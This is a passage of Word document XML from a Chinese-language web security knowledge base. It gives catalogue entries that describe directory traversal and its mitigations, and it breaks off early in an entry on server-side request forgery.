              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者可以从描述性错误消息中收集有关查询性质的信息。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>输入验证必须与自定义错误页面结合使用，以便在不泄露有关数据库或应用程序的信息的情况下通知错误。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D4E05A0" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914"/>
    <w:p w14:paraId="2FB1EEA7" w14:textId="0EC7BEA1" w:rsidR="00A24C59" w:rsidRDefault="00A24C59" w:rsidP="00A24C59">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录遍历</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A24C59" w14:paraId="1E06BA80" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="581D4978" w14:textId="419A3A70" w:rsidR="00A24C59" w:rsidRDefault="00A24C59" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74EFD467" w14:textId="77777777" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76986166" w14:textId="77777777" w:rsidR="00A24C59" w:rsidRDefault="00A24C59" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EDD79F8" w14:textId="77777777" w:rsidR="00A24C59" w:rsidRDefault="00A24C59" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="219CF8EF" w14:textId="77777777" w:rsidR="00A24C59" w:rsidRDefault="00A24C59" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="032D7388" w14:textId="77777777" w:rsidR="00A24C59" w:rsidRDefault="00A24C59" w:rsidP="00A24C59">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3703B2D2" w14:textId="6DEEF9B7" w:rsidR="00A24C59" w:rsidRDefault="00A24C59" w:rsidP="00A24C59">
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录遍历攻击旨在访问存储在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根文件夹之外的文件和目录。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过使用“</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dot-dot-slash</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）”序列及其变体或使用绝对文件路径来操作引用文件的变量，可以访问存储在文件系统上的任意文件和目录，包括应用程序源代码或配置</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和关键系统文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应该注意的是，对文件的访问受到系统操作访问控制的限制（例如，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统上锁定或使用中的文件的情况下）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C7016" w14:textId="5531EDE9" w:rsidR="00A24C59" w:rsidRPr="00A24C59" w:rsidRDefault="00A24C59" w:rsidP="00AA6C05">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A24C59" w:rsidRPr="005C4554" w14:paraId="7786301D" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4A06D1E0" w14:textId="77777777" w:rsidR="00A24C59" w:rsidRPr="005C4554" w:rsidRDefault="00A24C59" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="02AE65DB" w14:textId="77777777" w:rsidR="00A24C59" w:rsidRPr="005C4554" w:rsidRDefault="00A24C59" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A24C59" w:rsidRPr="00671A0D" w14:paraId="7A540A20" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71F0B328" w14:textId="78AEBD21" w:rsidR="00A24C59" w:rsidRPr="00671A0D" w:rsidRDefault="00A24C59" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用内容管理系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A160895" w14:textId="629A999E" w:rsidR="00A24C59" w:rsidRPr="00671A0D" w:rsidRDefault="00A24C59" w:rsidP="00A24C59">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果您的网站处理大量文档，那么上传，索引，发布和替换文档的工作流程可能会非常复杂。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>您可能有非技术用户充当管理员。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果是这种情况，请考虑使用专为这些情况设计的第三方内容管理系统。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A24C59" w:rsidRPr="00671A0D" w14:paraId="1D49E969" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05157134" w14:textId="118191BE" w:rsidR="00A24C59" w:rsidRPr="00671A0D" w:rsidRDefault="00A24C59" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用间接手段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22A489DF" w14:textId="32C0CE90" w:rsidR="00A24C59" w:rsidRPr="00671A0D" w:rsidRDefault="00A24C59" w:rsidP="00A24C59">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果内容管理系统被证明是一个太重要的解决方案，请考虑使用间接来标记您的文件。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>每次上传文件时，在您的站点上为此构建一个“友好”名称，当访问该文件时，在数据存储中执行查找以发现实际的文件路径。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A24C59" w:rsidRPr="00671A0D" w14:paraId="02EC1510" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="378C19DE" w14:textId="75DE98C5" w:rsidR="00A24C59" w:rsidRPr="00671A0D" w:rsidRDefault="00A24C59" w:rsidP="00A24C59">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>隔离文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14C92062" w14:textId="7797B479" w:rsidR="00A24C59" w:rsidRPr="00671A0D" w:rsidRDefault="00A24C59" w:rsidP="00A24C59">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在单独的文件服务器或文件分区或云存储中托管文档也是一个好主意。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>这样可以防止混合公共文档和更敏感的材料。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A24C59" w:rsidRPr="00A24C59" w14:paraId="7D7E0F8E" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33174911" w14:textId="207F2B27" w:rsidR="00A24C59" w:rsidRPr="00A24C59" w:rsidRDefault="00A24C59" w:rsidP="00A24C59">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A24C59">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>清理文件名参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F5AE7DF" w14:textId="49A74BB0" w:rsidR="00A24C59" w:rsidRPr="00A24C59" w:rsidRDefault="00A24C59" w:rsidP="00A24C59">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A24C59">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>最安全的方法是将文件名限制为已知正常字符的列表，并确保对文件的任何引用仅使用这些字符。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A24C59" w:rsidRPr="00A24C59" w14:paraId="08507B09" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69BEDD7F" w14:textId="5D5361B8" w:rsidR="00A24C59" w:rsidRPr="00A24C59" w:rsidRDefault="00A24C59" w:rsidP="00A24C59">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>清理文件名参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A444679" w14:textId="62D8C807" w:rsidR="00A24C59" w:rsidRPr="00A24C59" w:rsidRDefault="00A24C59" w:rsidP="00A24C59">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保服务器进程只能访问所需的目录。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果你在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Unix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>上运行，请考虑在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>chroot jail</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中运行该进程。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果发现目录遍历漏洞，这将降低风险。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35F0C8E6" w14:textId="77777777" w:rsidR="00A24C59" w:rsidRDefault="00A24C59" w:rsidP="00A24C59"/>
    <w:p w14:paraId="7389E0D0" w14:textId="7F6F9742" w:rsidR="00FA7539" w:rsidRDefault="00FA7539" w:rsidP="00FA7539">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>服务端请求伪造（</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA7539" w14:paraId="23D8A165" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B829117" w14:textId="721E7BD6" w:rsidR="00FA7539" w:rsidRDefault="00FA7539" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FB47B57" w14:textId="77777777" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B04C6D8" w14:textId="77777777" w:rsidR="00FA7539" w:rsidRDefault="00FA7539" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="714D1BBD" w14:textId="77777777" w:rsidR="00FA7539" w:rsidRDefault="00FA7539" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="362E289B" w14:textId="77777777" w:rsidR="00FA7539" w:rsidRDefault="00FA7539" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48B4666C" w14:textId="77777777" w:rsidR="00FA7539" w:rsidRDefault="00FA7539" w:rsidP="00FA7539">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20AE52EB" w14:textId="77777777" w:rsidR="00FA7539" w:rsidRDefault="00FA7539" w:rsidP="00FA7539">
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器端请求伪造（也称为</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全漏洞，允许攻击者诱使服务器端应用程序向攻击者选择的任意域发出</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCA290E" w14:textId="6E08E83E" w:rsidR="00FA7539" w:rsidRDefault="00FA7539" w:rsidP="00FA7539">
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在典型的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
